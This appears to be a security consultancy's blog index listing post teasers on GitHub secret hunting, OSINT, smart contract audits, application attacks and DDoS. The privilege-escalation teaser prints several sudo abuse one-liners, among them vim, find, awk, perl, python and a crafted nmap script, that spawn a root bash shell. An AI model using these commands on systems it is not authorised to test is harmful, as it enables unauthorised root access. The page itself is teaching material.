Github in the wild

Github in the wild

Github is important Oftentimes sensitive secrets stored in a target’s GitHub environment are overlooked and thus not reported in the tool output due to the limitations of automated scanning (regex, entropy searches, etc.). On the flip slide, too much information can be outputted by automated tools, making it difficult to discern true secrets from a…

Read More
Introduction to Doxing

Introduction to OSINT

OSINT OSINT stands for Open Source Intelligence, it’s the OSINT full form, and is one of the key aspects in understanding the cybersecurity that rules the Internet these days. The term OSINT comes from many decades ago, in fact, US military agencies started using the term OSINT in the late 1980’s as they were re-evaluating…

Read More
40 Methods For Privilege Escalation Part 1

40 Methods for Privilege Escalation(Part 1)

Abusing Sudo Binaries Domain: No Local Admin: Yes OS: Linux Type:  Abusing Privileged Files Methods:  sudo vim -c ‘:!/bin/bash’ sudo find / etc/passwd -exec /bin/bash \; echo “os.execute(‘/bin/bash/’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse sudo env /bin/bash sudo awk ‘BEGIN {system(“/bin/bash”)}’ sudo perl -e ‘exec “/bin/bash”;’ sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’ sudo less /etc/hosts –…

Read More

Smart Contract Security Audit

A smart contract is an automated transaction protocol that executes the terms of a contract. They are one of the most exciting areas of blockchain technology implementation.  The audit of a Smart Contract is technically the same as auditing a regular code. It entails meticulously investigating code to find security flaws and vulnerabilities before publicly…

Read More
Attacked From Behind Application

Attacked From Behind Application(EBook)

Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. Theseapplications are often websites, but can include databases (like SQL), standard services…

Read More
Attacked From Behind Application

Attacked From Behind Application

Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard…

Read More
DDos Methods & Mitigations

DDos Methods & Mitigations(EBook)

Distributed denial of service (DDoS) attacks are a subclass of denial of service (DoS) attacks. A DDoS attack involves multiple connected online devices, collectively known as a botnet, which are used to overwhelm a target website with fake traffic. In June 2022 Cloudflare reported detecting and mitigating a 26 million RPS DDoS attack on an…

Read More
DDos Methods & Mitigations

DDos Methods & Mitigations 

Distributed denial of service (DDoS) attacks are a subclass of denial of service (DoS) attacks. A DDoS attack involves multiple connected online devices, collectively known as a botnet, which are used to overwhelm a target website with fake traffic. History of DDos  Check out our timeline to see the progression of the largest and most…

Read More

Free Consultation

For a Free Consultation And Analysis Of Your Business, Please Fill Out The Opposite Form, Our Team Will Contact You As Soon As Possible.